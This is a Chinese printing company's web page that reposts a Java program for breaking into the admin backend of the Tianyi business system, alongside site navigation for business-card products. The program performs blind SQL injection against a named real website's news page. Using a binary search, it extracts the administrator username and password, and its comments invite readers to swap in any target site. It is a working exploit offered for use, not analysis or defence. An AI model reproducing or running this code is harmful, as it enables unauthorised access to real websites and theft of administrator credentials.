java程序破解天意商务系统后台帐号-会员卡,广州印刷,深圳印刷,印刷公司,名片,彩页,名片设计,设计教程,名片制作,彩色名片,名片模板,贵宾卡,pvc卡,设计欣赏,深圳名片,广州名片,business card design

首页	名片设计 CorelDRAW Illustrator AuotoCAD Painter 其他软件 Photoshop Fireworks Flash

» 彩色名片
» PVC卡
» 彩色磁性卡
» 彩页/画册
» 个性印务
» 彩色不干胶
» 明信片
   » 明信片
   » 彩色书签
   » 门挂
» 其他产品与服务
   » 创业锦囊
   » 办公用品
   » 信封、信纸
   » 便签纸、斜面纸砖
   » 无碳复印纸
   » 海报
   » 大篇幅印刷
   » KT板
   » 海报
   » 横幅

java程序破解天意商务系统后台帐号
java程序破解天意商务系统后台帐号

/**
文件名 : AttackTY.java
描述 : 针对天意商务系统的java程序，破解后台治理员用户名和密码，利用SQL Injection漏洞
注入地址为本网动态的某个新闻，这里以www.ejl.cn为例
作者：慈勤强
Email : cqq1978@Gmail.com
**/

import java.net.*;
import java.io.*;

public class AttackTY extends Thread
{
int iUserLen;
int iPwdLen;
String strKey="暂时还未";
String strU="http://www.ejl.cn/show_news.asp?newsid=105"; //只须修改这里，变成你要攻击的网站地址

//取得某个页面的函数
public String getContent(String strUrl)
{
try{
URL url=new URL(strUrl);
BufferedReader br=new BufferedReader(new InputStreamReader(url.openStream()));
String s="";
StringBuffer sb=new StringBuffer("");
while((s=br.readLine())!=null)
{
sb.append(s+"/r/n");
}
br.close();
return sb.toString();
}
catch(Exception e){
return "error open url" + strUrl;

}
}

//取得治理员用户名和密码的长度
private int getLen(String str)
{
AttackTY ou=new AttackTY();
String s,s1;
for(int i=2;i<20;i++)
{
s=strU+"%20and%20(select%20top%201%20len("+str+")%20from%20manage_user)="+i;
s1=ou.getContent(s);
if(s1.indexOf(strKey)<0)
{
return i;
}
}
return 0;
}

//二分法取得用户名和密码的Ascii码值
private void getValue(String str,int iLen)
{
AttackTY ou=new AttackTY();
String s,s1,s2;
s2="";
int iStart,iEnd,iNow;
for(int j=1;j<=iLen;j++)
{
iStart=33;
iEnd=126;
while(iEnd-iStart>1)
{
iNow=(iStart+iEnd)/2;
s=strU+"%20and%20(select%20top%201%20asc(mid("+str+","+j+",1))%20from%20manage_user)>"+iNow;
s1=ou.getContent(s);
if(s1.indexOf(strKey)<0)
{
iStart = iNow;
}
else
{
iEnd = iNow;
}
}

System.out.print((char)iEnd);
}
}

public static void main(String args[])
{
AttackTY ou=new AttackTY();
ou.iUserLen=ou.getLen("username");
ou.iPwdLen=ou.getLen("password");
System.out.println("用户名：" );
ou.getValue("username",ou.iUserLen);
System.out.println("/r/n密码：");
ou.getValue("password",ou.iPwdLen);
}
}

返回类别: 教程
上一教程: 学习java需要知道的一些问题
下一教程: Java数组学习心得，欢迎拍砖

您可以阅读与"java程序破解天意商务系统后台帐号"相关的教程:
· java程序员:开发系统要注重的基本知识
· Java调用系统执行程序(OS Command)
· 用JAVA实现数据库应用系统
· 编写跨平台Java程序注重事项
· JAVA程序员必读：基础篇（3）


	快精灵印艺坊版权所有	首页会员中心在线印刷在线编辑付款方式索取样品设计指南连锁门店网站地图关于我们友情链接